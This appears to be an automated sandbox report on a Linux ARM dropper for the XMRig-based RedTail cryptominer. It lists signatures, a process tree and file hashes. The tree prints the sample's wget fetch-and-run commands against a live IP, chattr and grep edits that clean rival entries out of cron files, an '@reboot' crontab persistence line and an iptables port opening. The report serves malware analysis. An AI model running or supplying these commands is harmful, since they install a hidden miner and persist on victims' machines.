Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    09-11-2024 22:53

General

  • Target

    63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446

  • Size

    1KB

  • MD5

    1bf0e6d92f2e0ef621ceeb072eed6b11

  • SHA1

    6cce0a196ec3af2df1cd9d38b053ac159add344b

  • SHA256

    63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446

  • SHA512

    e922ba2c485d302e5b64d7f25249e464cd5c8579a780ce8f6750aad798add89ad43097655980068eef707144ec1ba17fa7a21651b140b51cbc607beee4e90656

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (50691) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • XMRig Miner payload 1 IoCs
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Attempts to change immutable files 24 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads network interface configuration 2 TTPs 6 IoCs

    Fetches information about one or more active network interfaces.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Changes its process name 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 27 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446
    /tmp/63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446
    1⤵
    PID:660
      • /bin/cat
        cat /proc/mounts
        2⤵
        PID:668
      • /bin/grep
        grep noexec
        2⤵
        PID:669
      • /usr/bin/awk
        awk "{print \$2}"
        2⤵
        PID:670
      • /usr/bin/whoami
        whoami
        2⤵
        PID:676
      • /usr/bin/find
        find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*"
        2⤵
        • Reads network interface configuration
        • Reads CPU attributes
        • Enumerates kernel/hardware configuration
        • Reads runtime system information
        PID:678
      • /bin/uname
        uname -mp
        2⤵
        PID:788
      • /usr/bin/touch
        touch .testfile
        2⤵
        PID:789
      • /bin/dd
        dd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"
        2⤵
        PID:791
      • /bin/rm
        rm -rf .testfile .testfile2
        2⤵
        PID:792
      • /usr/bin/wget
        wget http://154.216.17.208/clean
        2⤵
        PID:793
      • /bin/chmod
        chmod +x clean
        2⤵
        • File and Directory Permissions Modification
        PID:794
      • /bin/sh
        sh clean
        2⤵
        • Writes file to tmp directory
        PID:795
          • /bin/systemctl
            systemctl disable c3pool_miner
            3⤵
            PID:796
          • /bin/systemctl
            systemctl stop c3pool_miner
            3⤵
            PID:797
          • /usr/bin/chattr
            chattr -ia /var/spool/cron/crontabs
            3⤵
            • Attempts to change immutable files
            PID:798
          • /usr/bin/chattr
            chattr -ia /etc/crontab
            3⤵
            • Attempts to change immutable files
            PID:799
          • /bin/grep
            grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab
            3⤵
            • Attempts to change immutable files
            PID:800
          • /bin/mv
            mv /tmp/clean_crontab /etc/crontab
            3⤵
            PID:801
          • /usr/bin/chattr
            chattr -ia /etc/cron.hourly
            3⤵
            • Attempts to change immutable files
            PID:802
          • /usr/bin/chattr
            chattr -ia /etc/cron.daily
            3⤵
            • Attempts to change immutable files
            PID:803
          • /usr/bin/chattr
            chattr -ia /etc/cron.daily/apt-compat
            3⤵
            • Attempts to change immutable files
            PID:804
          • /bin/grep
            grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat
            3⤵
            • Attempts to change immutable files
            PID:805
          • /bin/mv
            mv /tmp/clean_crontab /etc/cron.daily/apt-compat
            3⤵
            PID:806
          • /usr/bin/chattr
            chattr -ia /etc/cron.daily/bsdmainutils
            3⤵
            • Attempts to change immutable files
            PID:807
          • /bin/grep
            grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils
            3⤵
            • Attempts to change immutable files
            PID:808
          • /bin/mv
            mv /tmp/clean_crontab /etc/cron.daily/bsdmainutils
            3⤵
            PID:809
          • /usr/bin/chattr
            chattr -ia /etc/cron.daily/dpkg
            3⤵
            • Attempts to change immutable files
            PID:810
          • /bin/grep
            grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg
            3⤵
            • Attempts to change immutable files
            PID:811
          • /bin/mv
            mv /tmp/clean_crontab /etc/cron.daily/dpkg
            3⤵
            PID:812
          • /usr/bin/chattr
            chattr -ia /etc/cron.daily/exim4-base
            3⤵
            • Attempts to change immutable files
            PID:813
          • /bin/grep
            grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base
            3⤵
            • Attempts to change immutable files
            PID:814
          • /bin/mv
            mv /tmp/clean_crontab /etc/cron.daily/exim4-base
            3⤵
            PID:815
          • /usr/bin/chattr
            chattr -ia /etc/cron.daily/logrotate
            3⤵
            • Attempts to change immutable files
            PID:816
          • /bin/grep
            grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate
            3⤵
            • Attempts to change immutable files
            PID:817
          • /bin/mv
            mv /tmp/clean_crontab /etc/cron.daily/logrotate
            3⤵
            PID:818
          • /usr/bin/chattr
            chattr -ia /etc/cron.daily/passwd
            3⤵
            • Attempts to change immutable files
            PID:819
          • /bin/grep
            grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd
            3⤵
            • Attempts to change immutable files
            PID:820
          • /bin/mv
            mv /tmp/clean_crontab /etc/cron.daily/passwd
            3⤵
            PID:821
          • /usr/bin/chattr
            chattr -ia /etc/cron.weekly
            3⤵
            • Attempts to change immutable files
            PID:822
          • /usr/bin/chattr
            chattr -ia /etc/cron.monthly
            3⤵
            • Attempts to change immutable files
            PID:823
          • /usr/bin/chattr
            chattr -ia /etc/cron.d
            3⤵
            • Attempts to change immutable files
            PID:824
          • /usr/bin/chattr
            chattr -ia /etc/anacrontab
            3⤵
            • Attempts to change immutable files
            PID:825
          • /bin/grep
            grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab
            3⤵
            • Attempts to change immutable files
            PID:826
          • /bin/mv
            mv /tmp/clean_crontab /etc/anacrontab
            3⤵
            PID:827
          • /bin/rm
            rm -rf /tmp/63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446
            3⤵
            PID:828
          • /bin/rm
            rm -rf "/var/tmp/*"
            3⤵
            PID:829
          • /bin/rm
            rm -rf "/dev/shm/*"
            3⤵
            PID:830
      • /bin/rm
        rm -rf clean
        2⤵
        PID:831
      • /bin/rm
        rm -rf .redtail
        2⤵
        PID:832
      • /bin/grep
        grep -q x86_64
        2⤵
        PID:834
      • /bin/grep
        grep -q amd64
        2⤵
        PID:836
      • /bin/grep
        grep -q "i[3456]86"
        2⤵
        PID:840
      • /bin/grep
        grep -q armv8
        2⤵
        PID:842
      • /bin/grep
        grep -q aarch64
        2⤵
        PID:844
      • /bin/grep
        grep -q armv7
        2⤵
        PID:846
      • /usr/bin/wget
        wget http://154.216.17.208/arm7
        2⤵
        PID:847
      • /bin/mv
        mv arm7 .redtail
        2⤵
        PID:848
      • /bin/chmod
        chmod +x .redtail
        2⤵
        • File and Directory Permissions Modification
        PID:849
      • /.redtail
        ./.redtail
        2⤵
        • Executes dropped EXE
        • Changes its process name
        • Checks CPU configuration
        • Reads CPU attributes
        • Reads runtime system information
        PID:850
          • /bin/sh
            sh -c "command -v crontab >/dev/null 2>&1"
            3⤵
            PID:852
          • /bin/sh
            sh -c "crontab -r >/dev/null 2>&1; echo \"@reboot /.redtail\" | crontab -"
            3⤵
            PID:853
              • /usr/bin/crontab
                crontab -r
                4⤵
                PID:854
              • /usr/bin/crontab
                crontab -
                4⤵
                • Creates/modifies Cron job
                PID:856
          • /bin/sh
            sh -c "command -v php >/dev/null 2>&1"
            3⤵
            PID:857
          • /bin/sh
            sh -c "command -v nginx >/dev/null 2>&1"
            3⤵
            PID:858
          • /bin/sh
            sh -c "which apache2"
            3⤵
            PID:859
              • /usr/bin/which
                which apache2
                4⤵
                PID:860
          • /bin/sh
            sh -c "which httpd"
            3⤵
            PID:861
              • /usr/bin/which
                which httpd
                4⤵
                PID:862
          • /bin/sh
            sh -c "iptables -I INPUT -p tcp --dport 36239 -j ACCEPT >/dev/null 2>&1"
            3⤵
            • Attempts to change immutable files
            PID:864
              • /sbin/iptables
                iptables -I INPUT -p tcp --dport 36239 -j ACCEPT
                4⤵
                • Attempts to change immutable files
                PID:865

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /.testfile2
    Filesize: 2.0MB
    MD5: b2d1236c286a3c0704224fe4105eca49
    SHA1: 7d76d48d64d7ac5411d714a4bb83f37e3e5b8df6
    SHA256: 5647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee
    SHA512: 731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6

  • /arm7
    Filesize: 1.1MB
    MD5: 045daa66263bfd467051c013e9222faf
    SHA1: 4b943b14526d7bf7be2b3e3f9af24d1f35015548
    SHA256: d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4
    SHA512: bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f

  • /clean
    Filesize: 795B
    MD5: 397ff5e54194072e6d8a44a0d8cc1b27
    SHA1: 42477b0c3b277b5e907b0a35c644f3291ed30a63
    SHA256: d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e
    SHA512: ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74

  • /tmp/clean_crontab
    Filesize: 1KB
    MD5: 30e858769aacd9cc309502f8d5c6aa0f
    SHA1: 927c06dd4d6cbb5ca02e9505011c8667c47f2d6e
    SHA256: eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd
    SHA512: f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c

  • /tmp/clean_crontab
    Filesize: 3KB
    MD5: 02f33c9e59b27bcd241e488cd48de072
    SHA1: 9247eee9b2310d56455beccf41c577ba16b78e3d
    SHA256: 2565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14
    SHA512: 1eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d

  • /tmp/clean_crontab
    Filesize: 249B
    MD5: db990990933b6f56322725223f13c2bc
    SHA1: 387303696a796e27f559c73679e979f2a538072d
    SHA256: 777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1
    SHA512: a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5

  • /tmp/clean_crontab
    Filesize: 722B
    MD5: 8f111d100ea459f68d333d63a8ef2205
    SHA1: 077ca9c46a964de67c0f7765745d5c6f9e2065c3
    SHA256: 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
    SHA512: d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

                                                                                      • /tmp/clean_crontab

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        bc4a71cbcaeed4179f25d798257fa980

                                                                                        SHA1

                                                                                        61445721d0b5d86ac0a8386a4ceef450118f4fbb

                                                                                        SHA256

                                                                                        8eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767

                                                                                        SHA512

                                                                                        709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c

                                                                                      • /tmp/clean_crontab

                                                                                        Filesize

                                                                                        279B

                                                                                        MD5

                                                                                        911a774fe040993b929504f3d9415ab3

                                                                                        SHA1

                                                                                        55ccc8e95097f005abf9f4d91a14394e6d0f5da5

                                                                                        SHA256

                                                                                        340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d

                                                                                        SHA512

                                                                                        1eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f

                                                                                      • /var/spool/cron/crontabs/tmp.4FJSDc

                                                                                        Filesize

                                                                                        193B

                                                                                        MD5

                                                                                        3a871a2961731254829f22304aa10132

                                                                                        SHA1

                                                                                        2d2127ff0873b38cecd9f80cccfcd4f11f6199bb

                                                                                        SHA256

                                                                                        71727181c08671a7344860e8ce89a80f3a66a4f348a7f3d4351ea4d383b2003d

                                                                                        SHA512

                                                                                        f8dc9a3fcac9f17233f3a633ac6b06af9274864cae2b03e1656dc6c896ec4266e04b7d4a029ac6a447d2d3efe21c59c9132d83b63d6a9adb1dd538479cbaf7d1

                                                                                      • memory/850-1-0xb6b41000-0xb6ea6454-memory.dmp